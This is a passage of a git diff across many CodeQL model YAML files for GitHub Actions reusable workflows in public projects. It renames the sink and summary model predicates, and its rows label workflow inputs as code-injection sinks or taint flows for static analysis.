+++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 1aa154828876..9576ce3892a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 89dd705f5903..b78d61184114 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eb57c708bf53..cbe56806056b 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 048a753c553f..391bbc6aacb9 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 739f6a546b2d..f8b490726da9 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index f6c2769caaf9..889499eea3d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 4d104c74c667..2dce19050ed7 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] @@ -11,6 +11,6 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 2a9e2f9fd1ab..c80f8e732b64 100644 
--- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 9f56abf2858b..b85a11d81f2e 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 8c73342d5fe3..f8102400cc72 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 87253d882243..1af7b8322035 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9eb4c17cd3a8..c0688a4a5e06 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 860dcdcb43d4..4e91308a0049 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 539edcd58916..bc42c619599d 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index b1b37d967e9a..68925b294bb6 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51691edc1f97..c3ff42ed6049 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 3a14f6a879d5..964436f33ca8 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index c7f84e83db5a..995940550e19 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 72383be71ca2..93653f07819e 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 8b05adf053ea..961070778cfd 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9eec959ade3a..9f1cc82523cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 835301ecc73a..68babc09b6a1 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 9a99588239ee..f4271e5424b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 12c370b33ada..f20f7997d3c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 0e03216fc698..da5617fd144d 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 081378c96179..78821b4dad3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index fcd9c2929013..f0c9290ca22e 100644 
--- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 19822c29fcda..21d236989316 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index d0ccde698b1a..ac38cac602d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 027da83e922d..a9f87db955ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index a914aa631c3d..99c706b0c28b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index d0fe6b0eff5a..f8d0172d684b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 3d3a4de2946a..5afda471f8b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4c58af6969dc..4e5ca50ccec1 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 8629f279891a..02801615bd51 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 4a6bbd77ec97..d808d612857f 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index c22998ee52a4..e543dc8b7f34 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index c74922e61dc0..891d902f4709 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index c9c7e8318f7e..334d64dfbece 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 169094c3eb38..2c600cd7f7d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 6e4e4f4f1e90..cc6c4e620e60 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index dbc26ef9f04f..efbf050ddc96 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index c69de7cfcc26..9860bd3ab92f 100644 
